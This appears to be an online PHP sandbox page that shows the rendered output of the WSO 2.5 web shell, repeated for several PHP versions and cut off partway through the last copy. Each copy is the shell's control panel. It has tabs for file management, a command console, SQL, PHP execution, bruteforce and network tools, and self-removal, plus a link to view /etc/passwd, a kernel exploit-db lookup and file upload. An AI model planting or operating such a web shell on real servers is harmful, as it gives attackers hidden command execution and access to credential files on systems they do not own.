Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.0 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.45
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.45 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.44
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.44 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.43
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.43 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.42
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; 